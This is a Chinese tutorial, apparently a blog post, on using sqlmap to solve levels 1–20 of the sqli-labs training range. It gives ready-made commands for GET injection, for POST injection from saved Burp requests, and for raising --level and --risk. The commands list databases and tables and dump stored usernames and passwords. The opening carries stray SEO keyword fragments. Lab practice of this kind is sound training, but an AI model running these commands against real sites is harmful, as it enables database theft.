做美图 网站有哪些东西,wordpress提醒,大流量网站 优化,怎么做付费的小说网站这个星期我们用手动注入打了前20关靶场#xff0c;今天我们用sqlmap直接梭哈前20关
1.介绍sqlmap
sqlmap是一个自动化的SQL注入工具#xff0c;其主要功能是扫描#xff0c;发现并利用给定的URL和SQL注入漏洞。
2.下载和使用sqlmap
官方下载地址#xff1a;GitHub - sq…这个星期我们用手动注入打了前20关靶场今天我们用sqlmap直接梭哈前20关
1.介绍sqlmap
sqlmap是一个自动化的SQL注入工具其主要功能是扫描发现并利用给定的URL和SQL注入漏洞。
2.下载和使用sqlmap
官方下载地址GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool 下载压缩包之后解压
那怎么使用呢
打开sqlmap被解压到的地方我解压到了F盘 直接在红色筐子里输入cmd即可打开窗口使用sqlmap 3.sqlmap基本语法
sqlmap是由python写成
使用方法python sqlmap.py -参数
常用用法
1.-h
-h是显示基本用法
语法python sqlmap.py -h 2. -u
-u是基础参数后面跟需要测试的URL常用于GET类型的注入
语法python sqlmap.py -u URL 3.--batch
--batch是可以在所有需要用户手动输入的的部分通常是询问执行yes还是no【样子是[Y/n]】执行默认操作不需要用户再输入
语法python sqlmap.py -u URL --batch
4.--level 等级
--level是测试等级等级越高测试越复杂共有五级当默认集数测试不出来时。可以提高等级。
语法python sqlmap.py -u URL --level
其余我们在做中介绍。
4.解题
Less-1——Less-10GET类型
前十关解法相同以第一关为例
1.库名 --dbs 查询库名 python sqlmap.py -u http://sqli-labs-php7-master/Less-1/?id1 --batch -dbs 2.表名 -D 表名 --tables 查询表名 python sqlmap.py -u http://sqli-labs-php7-master/Less-1/?id1 --batch -D security --tables 3.列名 -D 表名 -T 列名 --columns 查询列名 python sqlmap.py -u http://sqli-labs-php7-master/Less-1/?id1 --batch -D security -T users --columns 4.字段 -D 表名 -T 列名 -C 字段 --dump 查询字段 python sqlmap.py -u http://sqli-labs-php7-master/Less-1/?id1 --batch -D security -T users -C username,password --dump 要是这几关有的查询不出来记得还有--level 等级等级提升这一操作
Less-11——Less-17POST基础注入
从11关开始就需要bp抓包啦
创建一个文本文档在sqlmap文件夹中将POST报文保存在文本文档中
-r 代表文档
语法python sqlmap.py -r 文本文档 1.库名 python sqlmap.py -r 11.txt --batch -dbs 2.表名 python sqlmap.py -r 11.txt --batch -D security --tables 3.列名 python sqlmap.py -r 11.txt --batch -D security -T users --columns 4.字段 python sqlmap.py -r 11.txt --batch -D security -T users -C username,password --dump Less15-17这几关sqlmap跑的特别慢大家耐心等待17关记得输入一个用户名再抓包
Less18——Less20
这几关会发现爆表爆不出来 提示让用--level --risk 前面介绍 level了那什么是risk呢
“risk”参数用于控制攻击的深度数值越高攻击的幅度越大但也会增加攻击被发现的风险 //库名 python sqlmap.py -r 18.txt --batch -dbs --level3 --risk3 之后操作也是一样的
工具注入还是十分方便但是还是得熟练手工注入
